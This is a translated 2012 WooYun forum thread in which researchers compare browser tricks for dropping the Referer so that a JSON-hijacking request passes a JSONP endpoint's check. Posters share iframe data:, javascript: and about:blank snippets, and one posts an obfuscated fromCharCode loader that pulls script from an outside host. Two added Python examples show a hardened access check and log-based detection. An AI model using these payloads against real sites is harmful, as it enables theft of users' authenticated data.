JSON hijack: how to drop the Referer

Category: WooYun-Zone

<script>
function func(str){
  alert(str)
}
</script>

<script src=http://www.xxx.com/xxx.cgi?callback=func ></script>

For this kind of attack: if http://www.xxx.com/xxx.cgi?callback=func only returns data when the Referer is in the xxx.com domain or the Referer is empty, how do you get around that?

The approaches known so far use cross-protocol tricks, https for example. Is there a better method?
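Added example (not code from the thread or from any poster): a Python model of the server-side rule the opening post describes, a JSONP endpoint that answers when the Referer is xxx.com or empty, next to a hardened version. The weak rule trusts a missing Referer and matches the domain by prefix; the strict one fails closed on a missing Referer, compares the host exactly, and requires a per-session token that a page on another origin cannot read. TRUSTED_HOSTS, the token parameter name and all sample values are assumptions made for this example.

```python
"""
Added example, not from the WooYun thread: access check for a JSONP endpoint
such as the thread's hypothetical xxx.cgi?callback=func.

weak_referer_check() reproduces the rule the thread starts from (empty Referer
trusted, domain matched by prefix).  strict_access_check() fails closed on a
missing Referer, matches the host exactly, and additionally demands a
per-session token.  Host names and token values are made up.
"""
from urllib.parse import urlsplit, parse_qs
import hmac

TRUSTED_HOSTS = {"www.xxx.com", "xxx.com"}   # constructed allow-list


def weak_referer_check(referer):
    """The rule described in the opening post: an empty Referer is trusted and
    the domain is matched by prefix.  Both choices are defects: frames loaded
    from about:blank or javascript: send no Referer at all, and a prefix match
    accepts any host that merely begins with the trusted name."""
    if not referer:
        return True
    return referer.startswith("http://xxx.com") or referer.startswith("http://www.xxx.com")


def referer_host_trusted(referer):
    """Exact host comparison; a missing or empty Referer is untrusted."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme in ("http", "https") and parts.hostname in TRUSTED_HOSTS


def strict_access_check(headers, query, session_token):
    """Decide whether an authenticated, callback-wrapped response may be served.

    headers:       dict of request headers (plain string keys for simplicity)
    query:         raw query string, e.g. 'callback=func&token=...'
    session_token: the anti-CSRF token bound to the caller's session cookie
    """
    if not referer_host_trusted(headers.get("Referer")):
        return False
    params = parse_qs(query)
    supplied = params.get("token", [""])[0]
    # A foreign page that only includes <script src=...> cannot read the
    # victim's token, so the wrapped data is never handed out to it even if
    # the browser attached the victim's cookies to the request.
    return hmac.compare_digest(supplied, session_token)


if __name__ == "__main__":
    print("weak, no Referer:  ", weak_referer_check(""))
    print("strict, no Referer:", strict_access_check({}, "callback=func&token=t1", "t1"))
    print("strict, same-site: ", strict_access_check(
        {"Referer": "https://www.xxx.com/page"}, "callback=func&token=t1", "t1"))
```

The token check is what actually carries the protection; the Referer comparison is kept only as a secondary signal, since the thread itself shows that its absence cannot be treated as evidence of anything. Serving authenticated data through a callback parameter at all is the root issue; a plain JSON endpoint with the same token requirement avoids the problem entirely.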

  1. 1#

    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-08-08 01:54

    Try building the GET or POST yourself in JavaScript?

  2. 2#

    piao2010 | 2012-08-08 09:41

    Ajax won't do it; you have to go a level lower. Supposedly WinHttp can.

  3. 3#

    piao2010 | 2012-08-08 09:45

    Alternatively, pull in another script (any language, as long as it can build an HTTP request), pass the relevant parameters to it, and then the fields of the constructed HTTP request are yours to set.

  4. 4#

    xsser | 2012-08-08 10:05

    It has to be found inside the browser layer. There doesn't seem to be anything especially good. Use Media Player?

  5. 5#

    Sogili (.) 长短短 (.) | 2012-08-08 10:19

    <iframe src="data:text/html,<script src=http://www.baidu.com></script>">
    http://jsbin.com/eduyid/
    IE doesn't support it, though :(

  6. 6#

    请叫我大神 | 2012-08-08 11:25

    @Sogili Yes, exactly. I'm looking for a universal method.

  7. 7#

    gainover | 2012-08-08 12:56

    <iframe id="aa" src=""></iframe>
    <script>
    document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
    </script>

  8. 8#

    gainover | 2012-08-08 12:56

    = = The code above doesn't seem to have displayed completely...

    <iframe id="aa" src=""></iframe>
    <script>
    document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
    </script>

  9. 9#

    _Evil (科普是一种公益行为) | 2012-08-08 12:56

    Watching the show and learning something.

  10. 10#

    gainover | 2012-08-08 12:58

    The principle is that setting xxx.src='javascript:"HTML code"'; drops the referer.

  11. 11#

    _Evil (科普是一种公益行为) | 2012-08-08 12:59

    @gainover You've gone beyond god... bypassed so easily 0.0 brilliant

  12. 12#

    p.z | 2012-08-08 13:14

    @gainover

  13. 13#

    lanz | 2012-08-08 14:29

    @gainover Under IE there's still a referer, though.

  14. 14#

    xsjswt | 2012-08-08 14:31

    @xsser No code, no proof. Asking for the Media Player one.

  15. 15#

    Zvall (ฏ๎ฏด้้้้้็็็็็้้้้้็็็็็้) | 2012-08-08 14:34

    Spectating!!!!!!!

  16. 16#

    Sogili (.) 长短短 (.) | 2012-08-08 14:37

    @lanz
    <iframe src="javascript:'<script src=http://www.baidu.com></script>'"></iframe>
    How about this?

  17. 17#

    xsser | 2012-08-08 14:38

    @gainover I'm going to send you WooYun coins!

  18. 18#

    gainover | 2012-08-08 15:05

    @lanz My packet capture here shows no referer.....

  19. 19#

    Sogili (.) 长短短 (.) | 2012-08-08 15:07

    @gainover Mine has one too, but with the code I posted upstairs there isn't one :(

  20. 20#

    gainover | 2012-08-08 15:21

    @lanz @Sogili Which IE version? I tested on IE8 and there was no referer...

  21. 21#

    insight-labs | 2012-08-08 15:23

    @请叫我大神 ftp works well; Firefox doesn't support it. Combine it with @Sogili's method and add a browser check, and that about covers it!

  22. 22#

    Sogili (.) 长短短 (.) | 2012-08-08 15:26

    @gainover IE8

  23. 23#

    rayh4c | 2012-08-08 15:34

    Requests initiated from an about:blank page have no referer.

  24. 24#

    gainover | 2012-08-08 15:35

    @Sogili = = That's odd. Did some patch close it?

  25. 25#

    请叫我大神 | 2012-08-08 16:01

    @rayh4c show me the code, wtf

  26. 26#

    also (阿里山的姑娘没水冲凉) | 2012-08-08 16:17

    @gainover Bowing to the master.

  27. 27#

    rayh4c | 2012-08-08 16:38

    @请叫我大神 When src is empty, the frame is an about:blank page, a blank page. A request initiated from a blank page naturally has no referer; that's the key point.

  28. 28#

    Sogili (.) 长短短 (.) | 2012-08-08 16:58

    @rayh4c = = If you write() into it, there will be a referer.

  29. 29#

    rayh4c | 2012-08-08 17:18

    @Sogili write() has one because the DOM object is associated with the parent window of the about:blank page. Try these methods on a non-about:blank page; there should be a referer.

  30. 30#

    Sogili (.) 长短短 (.) | 2012-08-08 17:20

    <iframe src="" id=x></iframe>
    <script defer>
    x.document.body.innerHTML='-<script defer src=http://www.baidu.com><\/script>';
    </script>

  31. 31#

    rayh4c | 2012-08-08 17:30

    @Sogili - -!! What I mean is, take a normal site and inject the code below via the pseudo-protocol; there will definitely be a referer.

    javascript:'<script src=http://www.baidu.com><\/script>'

    If your code runs in a non-about:blank page there will definitely be a referer; going through the DOM creates a parent-child window relationship.

  32. 32#

    Sogili (.) 长短短 (.) | 2012-08-08 17:34

    @rayh4c My test here shows none :)

  33. 33#

    Sogili (.) 长短短 (.) | 2012-08-08 17:37

    @rayh4c write() has one, innerHTML doesn't.

  34. 34#

    rayh4c | 2012-08-08 17:53

    @Sogili Indeed there isn't. X, filled in dynamically, is still about:blank; Y, after write(), is no longer about:blank.

    <iframe src="" id=x></iframe>
    <script defer>
    x.document.body.innerHTML='-<script defer>alert(\'x:\'+window.parent.x.location)<\/script>';
    </script>

    <iframe src="" id=y></iframe>
    <script defer>
    y.document.write('-<script defer>alert(\'y:\'+window.parent.y.location)<\/script>');
    </script>
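Added example, not from the thread or any poster: detection logic run over constructed access-log lines. The posts above establish that a request issued from an about:blank or javascript: frame carries no Referer, so a Referer-gated callback endpoint sees the same request whether it came from a foreign page or from a blank tab. On the log side, an authenticated request to a callback endpoint with an empty Referer is therefore the combination to flag. The log format, the trailing "session cookie present" field and the JSONP_PATHS list are assumptions made for this example; /xxx.cgi is the thread's own placeholder endpoint.

```python
"""
Added example, not from the WooYun thread: flag JSONP requests that arrive with
no Referer while the browser attached a session cookie.

Log lines below are constructed in a combined-log style with one extra quoted
field at the end recording whether a session cookie was present ("yes"/"no").
Real servers can emit such a field through their own log-format directives;
the exact layout here is an assumption.
"""
import re
from urllib.parse import urlsplit, parse_qs

SAMPLE_LOG = """\
198.51.100.7 - - [08/Aug/2012:12:56:01 +0800] "GET /xxx.cgi?callback=func HTTP/1.1" 200 512 "-" "Mozilla/5.0" "yes"
198.51.100.7 - - [08/Aug/2012:12:56:02 +0800] "GET /xxx.cgi?callback=func HTTP/1.1" 200 512 "http://www.xxx.com/home" "Mozilla/5.0" "yes"
203.0.113.9 - - [08/Aug/2012:12:57:10 +0800] "GET /xxx.cgi?callback=func HTTP/1.1" 200 512 "-" "Mozilla/5.0" "no"
203.0.113.9 - - [08/Aug/2012:12:58:00 +0800] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "yes"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>yes|no)"$'
)

# Endpoints known to wrap their response in a caller-supplied callback
# (assumed list; /xxx.cgi is the thread's placeholder).
JSONP_PATHS = {"/xxx.cgi"}


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_suspicious(entry):
    """Callback endpoint + callback parameter + empty Referer + session cookie
    + successful response: data was wrapped in script and handed to a page
    the server could not identify."""
    url = urlsplit(entry["target"])
    if url.path not in JSONP_PATHS:
        return False
    if "callback" not in parse_qs(url.query):
        return False
    no_referer = entry["referer"] in ("", "-")
    return no_referer and entry["cookie"] == "yes" and entry["status"] == "200"


def find_suspicious(log_text):
    """Return (line_number, client_ip, timestamp) for every flagged request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry and is_suspicious(entry):
            hits.append((n, entry["ip"], entry["time"]))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("authenticated callback response served without Referer:", hit)
```

Only the first sample line is flagged: the second carries a same-site Referer, the third has no session cookie (an unauthenticated fetch leaks nothing), and the fourth is not a callback endpoint. A single hit is not proof of anything, since a blank tab produces the same request, but a burst of them across many client addresses against one callback endpoint is the footprint the thread's technique would leave.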

  35. 35#

    Sogili (.) 长短短 (.) | 2012-08-08 18:08

    @rayh4c Yes, indeed.

  36. 36#

    gainover | 2012-08-08 22:59

    @Sogili After getting back to the dorm I tested again; written this way there is no referer. It seems you can't use JS to make another dynamic call here; you can only insert the <script> directly.

  37. 37#

    lanz | 2012-08-10 10:15

    @Sogili @gainover Once IE is taken care of, FF stops cooperating; you can't have both. Simpler to just use https.

  38. 38#

    啤酒 (xx) | 2012-08-10 23:41

    And if you want to get hold of the returned data?

  39. 39#

    啤酒 (xx) | 2012-08-10 23:51

    @Zvall http://zone.wooyun.org/upload/avatar/avatar_686_b.jpg Guess how the avatar was obtained?